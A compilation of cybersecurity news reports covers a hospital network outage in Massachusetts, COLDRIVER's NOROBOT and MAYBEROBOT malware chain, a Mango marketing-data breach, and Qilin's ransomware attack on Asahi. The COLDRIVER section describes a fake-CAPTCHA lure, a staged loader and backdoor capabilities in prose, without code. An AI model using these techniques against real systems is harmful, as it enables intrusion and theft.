A cyberattack on hospitals in North Central Massachusetts has caused major operational disruptions at Heywood Hospital in Gardner and Athol Hospital, a smaller critical access facility in Athol. Both hospitals are operated by Heywood Healthcare, a non-profit organization serving the region.  The incident, which was first detected last week, led to an immediate network shutdown as part of emergency response protocols to contain the breach and protect patient data and hospital systems. Following detection, a “Code Black” was declared, a designation used in healthcare settings to indicate a critical system outage, and emergency departments were closed to ambulance arrivals. Ambulances had to be rerouted to other regional hospitals due to system inaccessibility. 

Decoding the Athol and Heywood Hospital Cyberattack

The hospital cyberattack disrupted vital services, including Internet access, email communication, and phone lines. Radiology and laboratory operations were also affected. While communication systems have since been partially restored, hospital officials confirmed on October 16, 2025, that the outage was due to a cybersecurity incident. A third-party cybersecurity firm has been brought in to investigate the breach and support recovery efforts.  Despite the disruption, both Heywood Hospital and Athol Hospital have remained open for patient care, including outpatient services provided by Heywood Medical Group. Officials stressed that patient safety remains the top priority, and that care delivery continues, though some services are operating at reduced capacity.  As a temporary workaround, the Athena patient portal has been made accessible to facilitate communication between patients and providers. Patients unable to access the portal are advised to use the hospital’s answering service. 

Why is the Healthcare Sector a Prime Target for Cybercriminals?

Healthcare facilities are prime targets for cybercriminals, particularly ransomware groups. According to a recent study conducted by the Ponemon Institute, 93% of healthcare organizations surveyed experienced a cybersecurity incident in the past year. Alarmingly, 72% of those incidents led to patient care disruptions, highlighting the direct impact such breaches have on healthcare delivery.  The same study pointed to consequences such as appointment cancellations, delayed intakes, extended hospital stays, worsened patient outcomes, and even increased mortality rates following cyberattacks. These findings emphasize the potentially life-threatening implications of cybersecurity lapses in healthcare environments. 

Investigation Ongoing, No Timeline for Full Recovery 

Heywood Hospital and Athol Hospital continue to work with cybersecurity professionals to investigate the breach and restore normal operations. While communication tools and some functions are back online, full system functionality has yet to be reestablished, and no specific timeline has been shared publicly.  The hospitals have not confirmed whether ransomware was involved, nor have they reported any evidence of stolen or exposed patient data. Heywood Healthcare has assured the public that it will continue to monitor the situation and provide updates as more information becomes available. 

Following the public disclosure of its LOSTKEYS malware in May 2025, the Russian state-sponsored threat group known as COLDRIVER, also tracked under aliases such as UNC4057, Star Blizzard, and Callisto, has rapidly evolved its cyber operations. According to research from the Google Threat Intelligence Group (GTIG), the group abandoned LOSTKEYS just five days after its exposure and began deploying new malware strains that demonstrate a significant escalation in development speed and operational aggression. COLDRIVER, a persistent threat group targeting high-profile individuals associated with NGOs, policy think tanks, and political dissidents, has shown adaptability and persistence in the face of increased scrutiny. GTIG reports that the group's latest efforts involve a chain of related malware families, delivered via a mechanism mimicking a CAPTCHA prompt, an evolution of its earlier COLDCOPY lures.

NOROBOT and the Infection Chain 

The main part of the campaign is NOROBOT, a malicious DLL file first distributed using a lure called “ClickFix.” This technique impersonates a CAPTCHA challenge, prompting users to verify that they are "not a robot", hence the malware name. Once the user runs the file via rundll32, NOROBOT initiates a sequence that connects to a hardcoded command-and-control (C2) server to retrieve the next stage of the malware. GTIG notes that NOROBOT has undergone continuous updates between May and September 2025. Initial versions were fetched and installed in a full Python 3.8 environment, which was then used to run a backdoor dubbed YESROBOT. This method left obvious traces, such as the Python installation, that could trigger alerts. As a result, COLDRIVER later replaced YESROBOT with a more streamlined and stealthier PowerShell-based backdoor: MAYBEROBOT.  NOROBOT’s earlier iterations relied on cryptographic obfuscation, splitting AES keys across various components. For instance, part of the key was stored in the Windows Registry, while the rest was embedded in downloaded Python scripts like libsystemhealthcheck.py. These files, hosted on domains such as inspectguarantee[.]org, were essential to decrypt and activate the final backdoor. 

YESROBOT: A Short-Lived Backdoor 

YESROBOT, a minimal Python backdoor, was observed only twice over a two-week window in late May 2025. Commands were AES-encrypted and issued over HTTPS, with system identifiers included in the User-Agent string. However, its limitations, such as the need for a full Python interpreter and lack of extensibility, led COLDRIVER to abandon it quickly.  GTIG believes YESROBOT served as a stopgap solution, hastily deployed after LOSTKEYS was exposed. The effort to maintain operational continuity suggests that COLDRIVER was under pressure to re-establish footholds on previously compromised systems. 

MAYBEROBOT: COLDRIVER's New Standard 

In early June 2025, GTIG identified a simplified version of NOROBOT that bypassed the need for Python altogether. This new variant fetched a single PowerShell command, which established persistence via a logon script and delivered a heavily obfuscated script known as MAYBEROBOT (also referred to as SIMPLEFIX by Zscaler).  MAYBEROBOT supports three functions: 

• Download and execute code from a specified URL. 
• Run commands using cmd.exe. 
• Execute PowerShell blocks. 

It communicates with the C2 server using a custom protocol, sending acknowledgments and command outputs to predefined paths. Although minimal in built-in functionality, MAYBEROBOT's architecture is more adaptable and stealthy compared to YESROBOT.  GTIG assesses that this evolution marks a deliberate shift by COLDRIVER toward a more flexible toolset that avoids detection by skipping Python installation and minimizing suspicious behavior. 

COLDRIVER’s Continuous Malware Evolution 

From June through September 2025, GTIG observed COLDRIVER continuously refining NOROBOT and its associated delivery chains. These changes include: 

• Rotating file names and infrastructure. 
• Modifying DLL export names and paths. 
• Adjusting complexity to balance between stealth and operational control. 

Interestingly, while NOROBOT has seen multiple iterations, MAYBEROBOT has remained largely unchanged, suggesting the group is confident in its current capabilities. 

Spanish fashion retailer Mango has confirmed a data breach after one of its external marketing service providers suffered unauthorized access to limited customer information. The company emphasized that its corporate systems were not compromised and that financial or login details remain secure. The Mango data breach adds to a growing list of cybersecurity incidents hitting major global retailers in 2025. In its official statement, Mango said the exposed data included customers’ first names, countries, postal codes, email addresses, and phone numbers. The company clarified that last names, banking information, credit card details, or passwords were not affected in the breach. “Mango’s infrastructure and corporate systems have not been compromised,” the company said, assuring customers that normal operations continue. Upon discovering the breach, Mango immediately activated its security protocols and notified the Spanish Data Protection Agency (AEPD) and relevant authorities as required under data protection laws. The retailer also urged customers to remain cautious of suspicious emails or phone calls and avoid sharing personal details with unknown sources. For assistance, Mango has made its customer service email and helpline available to address any concerns.

Responds Swiftly to Contain Mango Data Breach

According to the company, the Mango data breach was limited to marketing-related data held by an external provider. This incident did not involve Mango’s main network or systems handling sensitive information. The fashion retailer said it took “immediate action” to contain the issue and ensure no further exposure. Mango reiterated its commitment to privacy, stating, “We regret any inconvenience this specific incident may have caused. The protection of our customers’ data remains a top priority.” [caption id="attachment_106085" align="aligncenter" width="660"] Source: X[/caption] The Spanish Data Protection Agency (AEPD) has been informed, and Mango continues to cooperate fully with authorities as investigations continue.

Retail Cybersecurity Under Pressure Amid Global Attacks

The Mango data breach comes amid a series of high-profile retail cyberattacks across Europe and the United States this year. Just weeks earlier, luxury fashion house Louis Vuitton disclosed a cyberattack — the third within 90 days — that exposed customer data from its global and Korean operations. The LVMH cyberattack, confirmed on July 2, 2025, affected personal information but not payment data. In May, Victoria’s Secret also reported a security incident that forced the company to temporarily take down its U.S. website while investigations were ongoing. Meanwhile, UK logistics firm Peter Green Chilled, a supplier to supermarkets like Tesco and Sainsbury’s, experienced a cyberattack that disrupted operations. Luxury retailer Harrods was another recent victim, confirming a Harrods cyberattack in April 2025 that prompted precautionary restrictions on internet access at its sites. Although customer services remained active, the incident highlight the increasing pressure on retail cybersecurity worldwide.

Maintains Strong Business Performance Despite Mango Data Breach

Despite the recent Mango data breach, company's business continues to show strong growth. The company reported a turnover of €1.728 billion in the first half of 2025, marking a 12% increase year-over-year and a 14% growth at constant exchange rates. The retailer invested around €110 million in strategic projects during this period, with 70% allocated to new store openings and refurbishments. With a presence in 120 countries and 2,925 points of sale worldwide, Mango’s international business now represents 78% of total turnover. Its top-performing markets include Spain, France, Turkey, Germany, and the United States.

Ongoing Focus on Customer Trust and Cyber Resilience

As the Mango data breach investigation continues, the retailer is reinforcing its cybersecurity measures and reviewing third-party security policies to prevent similar incidents in the future. The company said it remains committed to transparency and the protection of customer data. “MANGO makes our Customer Service email address (personaldata@mango.com) and telephone number (900 150 543) available for any additional questions, and we regret any inconvenience this specific incident may have caused you,” reads company’s statement.  “As always, we want to thank you for your trust and commitment to our brand,” statement concluded.

Japanese beverage and food giant Asahi Group Holdings has confirmed that a ransomware attack has disrupted its operations and may have led to a leak of personal and financial data. The Asahi Group cyberattack has forced the company to delay the release of its financial results for the January–September period, which was originally scheduled for November 12, 2025. The cyberattack on Asahi Group, which occurred on September 29, 2025, caused a major system disruption across Asahi’s domestic operations, suspending automated order and shipment processes. Despite the challenges, the company has prioritized maintaining product supply and has begun manual order processing and partial shipments to customers.

Asahi Group Cyberattack Claimed by Qilin

A hacker group calling itself Qilin claimed responsibility for the ransomware attack on October 7, alleging it had stolen more than 9,300 data files, including employee personal information and financial records. The following day, Asahi confirmed that some of the data claimed to be stolen was indeed found online. Investigations are ongoing to determine the extent of the Asahi Group data breach and the nature of the compromised data. The company stated that while the incident impacted its technology infrastructure in Japan, there is currently no indication that systems or data outside Japan were affected. “As part of our ongoing investigation, we have confirmed that data suspected to have been transferred without authorization has been found on the internet,” the company said. “We are conducting investigation to determine the nature and scope of the information that may have been subject to unauthorized transfer. Should the investigation confirm any impact from unauthorized data transfer, notifications will be delivered promptly.”

Operational Recovery Underway

The Asahi Group ransomware attack temporarily halted operations at Asahi’s domestic production facilities. However, gradual recovery efforts have been underway since early October.

• Asahi Breweries resumed production at all six of its factories on October 2, with partial shipments of Asahi Super Dry restarting soon after. From October 15, shipments of other products such as Asahi Draft Beer and Asahi Dry Zero are set to partially resume.
• Asahi Soft Drinks began partial production at six of its seven domestic factories by October 8, and all seven factories are expected to resume operations by October 9.
• Asahi Group Foods has also partially resumed production at all seven of its domestic facilities.

Despite these progress updates, Asahi’s systems have yet to be fully restored, and no clear timeline for complete recovery has been provided. The Asahi Group cyberattack has also delayed access to critical accounting-related data, which has impacted the company’s ability to finalize its third-quarter financial reports.

Financial Reporting Delayed

In its official statement, Asahi Group said the delay in its financial disclosures was necessary to ensure accuracy and compliance. “The Company sincerely apologizes for any inconvenience this postponement may cause to its shareholders, investors, and other stakeholders,” the statement read. The firm added that it is reviewing the impact of the system disruption on its financial performance and will announce a new disclosure date once restoration efforts progress further. The company has assured that updates regarding the Asahi Group cyberattack, its financial results, and any confirmed data exposures will be made promptly and transparently.